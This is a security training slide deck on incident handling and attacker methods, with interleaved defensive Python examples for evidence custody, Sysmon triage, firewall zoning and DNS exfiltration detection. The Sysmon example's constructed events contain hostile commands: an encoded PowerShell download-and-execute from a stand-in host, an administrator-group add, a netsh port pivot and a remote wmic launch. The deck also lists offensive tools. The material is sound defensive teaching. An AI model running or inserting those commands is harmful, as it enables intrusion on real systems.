Incident Handling, Hacker Techniques
and Countermeasures
José L. Quiñones, BSEET
MCSA, RHCSA, C|EH, C|ECI, C)PEH, C)M2I, GCIH, GPEN, HIT
Disclaimer
• I am not a lawyer, I don’t play one on TV and I don’t
pretend to be an expert in legal matters.
• If you require a legal opinion, seek the services of a
lawyer proficient in Information Security laws and
regulations.
• All information contained here is the product of
personal research and experience in the fields of IT, HIT,
and Information Security.
• All copyrights of images and/or references go to their
respective owners.
Incident Handling
• It’s a plan to deal with the misuse of computer systems and
networks.
• Written procedures and policy to know what to do and how
to do it when it happens.
• An incident is an adverse “event” in the information systems
and/or network.
The Incident handling process
Preparation
Identification
Containment
Eradication
Recovery
Lessons Learned
Preparation
• Policies and Procedures
• Operational Controls
• Supplies (Software, Hardware, Notebook, etc.)
• People (Team)
• Space (War Room)
• Secure Communications & Channels
• Drills, Practices, Training
Identification
• Be alert! Maintain situational awareness and communicate (meet
often)
• Correlate
• Assign the primary and a sidekick
• Enforce “need to know” lockdown
• Sources
• Network, System & Application
• Look for suspicious events
• Establish chain of custody
Containment
• Collect Forensic Data
• Take control
• Stop the bleeding
• Stop attacker from getting deeper
• Characterize the incident
• Inform Management
• Track and Analyze
• Create ACLs, Patch, or Disconnect …
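The Identification and Containment steps above both hinge on evidence that will hold up later: "establish chain of custody" and "collect forensic data". The following is an added example (not code from the deck or its author) of the minimum a handler needs for that: hash each item at collection time, keep an append-only custody log, and re-verify before analysis or hand-off. The case id, analyst names and the two evidence files are constructed for the demo.

```python
"""Evidence manifest with SHA-256 hashes and a custody log (added example, not from the deck)."""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in chunks so memory dumps and disk images do not need to fit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def _now():
    return datetime.now(timezone.utc).isoformat(timespec="seconds")


def build_manifest(paths, collector, case_id):
    """Hash every evidence item once, at collection time, and open the custody log."""
    items = [{"path": os.path.abspath(p), "size": os.path.getsize(p), "sha256": sha256_file(p)}
             for p in paths]
    return {
        "case_id": case_id,
        "items": items,
        "custody": [{"event": "collected", "by": collector, "to": collector, "at": _now()}],
    }


def record_transfer(manifest, from_person, to_person, note=""):
    """Append a hand-off; the log is append-only so every holder is accounted for."""
    manifest["custody"].append(
        {"event": "transferred", "by": from_person, "to": to_person, "at": _now(), "note": note})


def verify_manifest(manifest):
    """Re-hash every item; returns the paths that are missing or changed (empty list = intact)."""
    changed = []
    for item in manifest["items"]:
        path = item["path"]
        if not os.path.isfile(path) or sha256_file(path) != item["sha256"]:
            changed.append(path)
    return changed


def demo():
    """Constructed evidence (not real artifacts): a fake memory image and a netstat capture."""
    with tempfile.TemporaryDirectory() as workdir:
        mem = os.path.join(workdir, "memory.dmp")
        net = os.path.join(workdir, "netstat.txt")
        with open(mem, "wb") as fh:
            fh.write(b"\x00" * 4096)
        with open(net, "w") as fh:
            fh.write("TCP 10.0.0.5:49152 203.0.113.7:443 ESTABLISHED\n")

        manifest = build_manifest([mem, net], collector="analyst1", case_id="IR-0001")
        record_transfer(manifest, "analyst1", "forensics-lab", note="sealed bag #17")

        # Persist the manifest next to the evidence; the next holder gets the JSON (or its hash).
        manifest_path = os.path.join(workdir, "manifest.json")
        with open(manifest_path, "w") as fh:
            json.dump(manifest, fh, indent=2)
        with open(manifest_path) as fh:
            reloaded = json.load(fh)

        intact = verify_manifest(reloaded)            # expected: []
        with open(net, "a") as fh:                    # simulate tampering after collection
            fh.write("TCP 10.0.0.5:49153 198.51.100.9:443 ESTABLISHED\n")
        tampered = verify_manifest(reloaded)          # expected: ["netstat.txt"]
        return intact, [os.path.basename(p) for p in tampered], len(reloaded["custody"])


if __name__ == "__main__":
    print(demo())
```

The manifest itself should be hashed or signed and stored separately from the evidence; otherwise whoever can alter the evidence can also rewrite the hashes.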
Eradication
• Determine cause of symptoms
• Implement appropriate remedies
• Remove malware or any other hacking tool
• Improve your defenses
• Restore from clean backups
• Do a Vulnerability Assessment
Recovery
• Get validation from business units
• Test operations
• Restore Operations
• Monitor
• Look for “stuff” to come back
Lessons Learned
• Review the data
• How did everyone perform?
• What was the impact on the company?
• Did the controls work?
• Were the policies and procedures enough?
• Follow up report and meet with the team
• Make any modifications to existing controls and/or implement new
ones.
What are you defending from?
… from Hacking, Penetration, Breach!
• Reconnaissance/OSINT
• Scanning / Enumeration
• Gaining Access / Exploitation
• Post-exploitation/Loot/Escalate
• Covering Tracks / Cleanup
------
• Reporting (only on sanctioned attacks or exercises)
Reconnaissance/OSINT
Open Source Intelligence is a term used to refer to the data
collected from publicly available sources to be used in
an intelligence context. In the intelligence community, the
term "open" refers to overt, publicly available sources (as
opposed to covert or clandestine sources).
The Tools
• https://inteltechniques.com/links.html
• Recon-ng
• The Harvester
• GHDB
Scanning / Enumeration
• Active Directory
• PowerShell (Get-ADComputer)
• WMI
• DNS
• dnsrecon/dnsenum
• Network
• nmap
• ping/traceroute/arp
• Frameworks (scripts)
• Redhawk/Sn1per
Vulnerability Scanning
Automated
• Nessus
• Nexpose
• OpenVAS
• Nmap scripts (NSE)
• Qualys
• WPScan
• Nikto
• Acunetix (web applications)
Manual
• National Vulnerability Database (NVD)
• CVE (cve.mitre.org)
• Fuzzing
Exploitation
• Metasploit Framework
• PowerShell Empire
• Offensive Security Exploit-DB / searchsploit
• Packetstorm Security
Post-exploitation
• Loot
• Take files and any information
• Dump credentials
• hashes/tokens/password
• Crack passwords
• hashcat/oclHashcat
• John the Ripper
• Ophcrack/RainbowCrack
• Pivot
• Lateral movement
APT Style
• RATs are common and NOT very sophisticated
• DNS exfiltration
• Encryption is the standard: SSL/TLS tunneling
• They use built-in system tools to stay under the radar
Living off the land …
• Old-fashioned CLI tools
• tasklist
• taskkill
• net
• netsh
• ipconfig
• netstat
• WMI
• wmic
• PowerShell
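Because these are legitimate binaries, the signal is in who launched them and with what arguments, not in the file itself. The following is an added example (not from the deck or its author) of triage rules run over Sysmon Event ID 1 (process creation) records: an Office application spawning a scripting host, PowerShell with an -EncodedCommand payload (decoded so keyword rules can see inside it), net user/localgroup ... /add, netsh portproxy pivots and wmic process call create. The six events, the paths and the addresses in them are constructed, not real telemetry.

```python
"""Triage of Sysmon Event ID 1 (process creation) records for living-off-the-land abuse.
Added example; the events below are constructed, not real telemetry."""
import base64
import binascii
import re

LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
           "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe", "wmic.exe", "msiexec.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

ENCODED_FLAG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+(?P<b64>[A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_PS = re.compile(r"downloadstring|downloadfile|\biex\b|invoke-expression|frombase64string|"
                           r"-nop\b|-w(?:indowstyle)?\s+hidden|bypass", re.I)
NET_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+(?:user|localgroup)\b.*\s/add\b", re.I)
PORTPROXY = re.compile(r"\bnetsh\s+interface\s+portproxy\s+add\b", re.I)
WMIC_CREATE = re.compile(r"\bwmic\b.*\bprocess\s+call\s+create\b", re.I)


def basename(image_path):
    return image_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_powershell(cmdline):
    """-EncodedCommand carries base64 of UTF-16LE script text; return it decoded, or None."""
    match = ENCODED_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group("b64"), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(event):
    """Return the list of rule names an event trips (empty list = nothing suspicious)."""
    image, parent, cmd = basename(event["Image"]), basename(event["ParentImage"]), event["CommandLine"]
    hits = []
    if parent in OFFICE_PARENTS and image in LOLBINS:
        hits.append("office-app-spawned-lolbin")
    if image in POWERSHELL:
        decoded = decode_encoded_powershell(cmd)
        if decoded is not None:
            hits.append("encoded-powershell")
        # Match on the decoded payload too, otherwise -enc hides every keyword.
        if SUSPICIOUS_PS.search(cmd if decoded is None else cmd + "\n" + decoded):
            hits.append("suspicious-powershell")
    if NET_ADD.search(cmd):
        hits.append("net-user-or-group-add")
    if PORTPROXY.search(cmd):
        hits.append("netsh-portproxy-pivot")
    if WMIC_CREATE.search(cmd):
        hits.append("wmic-process-create")
    return hits


def triage(events):
    """Map event id -> hits for every event that tripped at least one rule."""
    result = {}
    for event in events:
        hits = analyze(event)
        if hits:
            result[event["id"]] = hits
    return result


def _b64_utf16(script):
    """Build an -EncodedCommand argument the way an attacker (or an admin) would."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [  # constructed Sysmon EID 1 records, trimmed to the fields used here
    {"id": 1, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " +
                    _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s')")},
    {"id": 2, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net localgroup administrators svc_backup /add"},
    {"id": 3, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.12 connectport=3389"},
    {"id": 4, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic /node:10.0.0.12 process call create "cmd /c whoami > c:\\w.txt"'},
    {"id": 5, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"id": 6, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\ipconfig.exe",
     "CommandLine": "ipconfig /all"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, hits)
```

Events 5 and 6 (a scheduled backup script and ipconfig /all) trip nothing, which is the point: the rules key on parent/child relationships and arguments, so plain administrative use of the same binaries stays quiet. Sysmon needs a configuration that logs the command line and parent image for this to work.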
Remote Access Trojans / Remote Administration Tools (RATs)
• Poison Ivy
• Pupy
• Sakula
• ncat/netcat/cryptcat
• Cobalt Strike Beacon
• Metasploit Meterpreter
This is the reality …
• Breaches are going to happen; zero-days exist
• Detect and respond as fast as possible
• Detection only works in a low-noise environment
• Visibility and skill are key in managing an event
What do I do?
De·fend /dəˈfend/
resist an attack made on (someone or something); protect from harm or danger.
Defending
• Network Segmentation
• Subnetting
• ACLs
• Security Zones
• Management Network
• Server Farms
• Perimeter/Core Firewall
• Use IPS, IDS, AV and other features of your hardware
• Create chokepoints and monitor them
Use a tier system (e.g. Microsoft's tiered administration model with Privileged Access Workstations, PAW)
Silo the data
• Use data classification to identify your resources
• Maintain similar data in the same silo, do NOT mix them
• Create controls to protect those boundaries
• Apply separation of duties and least privilege principles
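Segmentation, a tier system and data silos only hold if the rules at the chokepoints enforce them. The following is an added example (not from the deck or its author) of a default-deny zone policy checked in code: addresses are mapped to zones, a flow is allowed only if an explicit rule matches, and a lint pass catches rules that let administrative protocols (SSH, RDP, WinRM) into server or management zones from anywhere other than the PAW zone. The address plan, port lists and the two policies are assumptions made up for the demo; the "weak" policy adds one helpdesk rule of the kind that quietly breaks the tier model.

```python
"""Zone-based chokepoint policy with a tier check (added example; addresses and rules are made up)."""
import ipaddress

ZONES = {  # assumed address plan
    "user_lan": ["10.10.0.0/16"],
    "paw": ["10.99.0.0/24"],          # privileged access workstations (admin hosts)
    "mgmt": ["10.250.0.0/24"],        # out-of-band management interfaces (BMC, switch mgmt)
    "server_farm": ["10.20.0.0/16"],
    "dmz": ["192.0.2.0/24"],
}
ZONE_NETS = {zone: [ipaddress.ip_network(n) for n in nets] for zone, nets in ZONES.items()}
ADMIN_PORTS = {22, 3389, 5985, 5986}   # SSH, RDP, WinRM

# Rules: (src_zone, dst_zone, protocol, allowed dst ports). Anything not listed is dropped and logged.
CORRECTED_POLICY = [
    ("user_lan", "dmz", "tcp", {80, 443}),
    ("user_lan", "server_farm", "tcp", {443, 445}),   # web apps and file shares only
    ("paw", "server_farm", "tcp", {22, 3389, 5985, 5986}),
    ("paw", "mgmt", "tcp", {22, 443}),
    ("dmz", "server_farm", "tcp", {443}),
]

# The same policy plus one "temporary" helpdesk rule that lets RDP in from the user LAN.
WEAK_POLICY = CORRECTED_POLICY + [("user_lan", "server_farm", "tcp", {3389})]


def zone_of(ip):
    """Return the zone an address belongs to, or None if it is outside the address plan."""
    addr = ipaddress.ip_address(ip)
    for zone, nets in ZONE_NETS.items():
        if any(addr in net for net in nets):
            return zone
    return None


def evaluate(policy, src_ip, dst_ip, proto, dport):
    """Default-deny: return (allowed, reason). Unzoned addresses never match a rule, so they are denied."""
    src_zone, dst_zone = zone_of(src_ip), zone_of(dst_ip)
    if src_zone is None or dst_zone is None:
        return False, f"deny: unzoned address {src_ip if src_zone is None else dst_ip}"
    if src_zone == dst_zone:
        # Assumption: east-west traffic inside one zone is not filtered at the chokepoint.
        return True, f"allow: intra-zone {src_zone}"
    for rule_src, rule_dst, rule_proto, ports in policy:
        if (rule_src, rule_dst, rule_proto) == (src_zone, dst_zone, proto.lower()) and dport in ports:
            return True, f"allow: {src_zone}->{dst_zone} {proto}/{dport}"
    return False, f"deny: no rule for {src_zone}->{dst_zone} {proto}/{dport} (log at chokepoint)"


def tier_violations(policy, admin_zone="paw"):
    """Lint: admin protocols into server or management zones must originate from the PAW zone only."""
    return [rule for rule in policy
            if rule[1] in ("server_farm", "mgmt") and rule[0] != admin_zone and rule[3] & ADMIN_PORTS]


if __name__ == "__main__":
    for flow in [("10.10.5.7", "10.20.1.10", "tcp", 443), ("10.10.5.7", "10.20.1.10", "tcp", 3389),
                 ("10.99.0.5", "10.20.1.10", "tcp", 3389), ("10.10.5.7", "10.250.0.9", "tcp", 22)]:
        print(flow, evaluate(CORRECTED_POLICY, *flow))
    print("weak policy violations:", tier_violations(WEAK_POLICY))
```

Run the lint against the exported rule base every time it changes; the single rule it flags in WEAK_POLICY is exactly the path an attacker on a user workstation needs to reach a server with stolen credentials.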
De·tect /dəˈtekt/
• discover or identify the presence or existence of.
• discover or investigate (a crime or its perpetrators).
• discern (something intangible or barely perceptible).
Detect!
• DNS
• Passive DNS Data
• Windows Events
• Windows Event Collector
• Group Policy Object (Audits)
• Sysinternals Sysmon
• Syslog
• Switches, Routers, Firewalls
• Network
• Net Flows
• Packet Capture
• Snort / Bro (now Zeek) IDS
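Passive DNS data is listed first for a reason: the DNS exfiltration mentioned under "APT Style" above leaves a distinctive trace in it. Hosts encode file chunks into query names, so one registrable domain receives many unique, long, high-entropy labels, often as TXT lookups. The following is an added example (not from the deck or its author) that profiles a query log per registrable domain and flags those patterns while leaving a CDN with many short host names alone. The log format, the thresholds and all traffic are constructed; the "last two labels" rule for the registrable domain is a simplification that a real deployment would replace with the public suffix list.

```python
"""Passive-DNS triage for DNS tunnelling / exfiltration (added example; log lines are constructed)."""
import hashlib
import math
from collections import defaultdict


def shannon_entropy(text):
    """Bits per character: encoded chunks score near 4 (hex) or 5 (base32/64), host names near 2 to 3."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname):
    """Assumption: the last two labels are the registrable domain (use the public suffix list in production)."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else labels[0]


def parse_log(lines):
    """Constructed format: '<timestamp> <client_ip> <qname> <qtype>' per line."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, client, qname, qtype = line.split()
        records.append({"ts": ts, "client": client, "qname": qname.lower(), "qtype": qtype.upper()})
    return records


def flag_exfil(records, min_unique=20, min_unique_ratio=0.8, min_entropy=3.0, min_label_len=24):
    """Flag registrable domains whose queries look like encoded data chunks rather than host names."""
    per_domain = defaultdict(lambda: {"queries": 0, "unique": set(), "entropy": 0.0,
                                      "label_len": 0, "txt": 0, "clients": set()})
    for r in records:
        d = per_domain[registered_domain(r["qname"])]
        first_label = r["qname"].split(".")[0]
        d["queries"] += 1
        d["unique"].add(r["qname"])
        d["entropy"] += shannon_entropy(first_label)
        d["label_len"] += len(first_label)
        if r["qtype"] == "TXT":
            d["txt"] += 1
        d["clients"].add(r["client"])

    flagged = {}
    for domain, d in per_domain.items():
        n = d["queries"]
        unique = len(d["unique"])
        mean_entropy = d["entropy"] / n
        mean_len = d["label_len"] / n
        if (unique >= min_unique and unique / n >= min_unique_ratio
                and mean_entropy >= min_entropy and mean_len >= min_label_len):
            flagged[domain] = {"queries": n, "unique_names": unique, "mean_entropy": round(mean_entropy, 2),
                               "mean_label_len": round(mean_len, 1), "txt_queries": d["txt"],
                               "clients": sorted(d["clients"])}
    return flagged


def sample_log():
    """Constructed traffic: one host tunnelling data out in hex labels, plus ordinary and CDN-style lookups."""
    lines = []
    for i in range(30):  # each chunk of the exfiltrated file becomes a unique 52-character label
        chunk = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:52]
        lines.append(f"2024-03-01T10:00:{i:02d}Z 10.10.4.23 {chunk}.t.example.net TXT")
    for i in range(25):  # a CDN: many unique names, but short and low-entropy
        lines.append(f"2024-03-01T10:01:{i:02d}Z 10.10.4.{i + 1} img{i}.cdn-example.com A")
    for i in range(15):  # ordinary repeated lookups
        for name in ("www.example.com", "mail.example.com", "update.example.org"):
            lines.append(f"2024-03-01T10:02:{i:02d}Z 10.10.4.{i + 1} {name} A")
    return lines


if __name__ == "__main__":
    for domain, stats in flag_exfil(parse_log(sample_log())).items():
        print(domain, stats)
```

Only example.net is flagged: thirty unique queries, every one a 52-character hex label, all TXT, all from one client. The CDN domain has just as many unique names but fails the entropy and length thresholds, which is what keeps the rule usable on a real resolver log. Tune the thresholds against a week of your own passive DNS before alerting on it.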
… and what do I do with all that data?
Elasticsearch
Logstash
Kibana (the ELK stack)
Re·spond /rəˈspänd/
reply to, make a response to, react.
STOP!
Document everything …
Conclusion …
Questions?
Thanks!
• josequinones@codefidelio.org
• @josequinones
• http://codefidelio.org
• jquinones@obsidisconsortia.org
• @obsidis_NGO
• http://obsidisconsortia.org
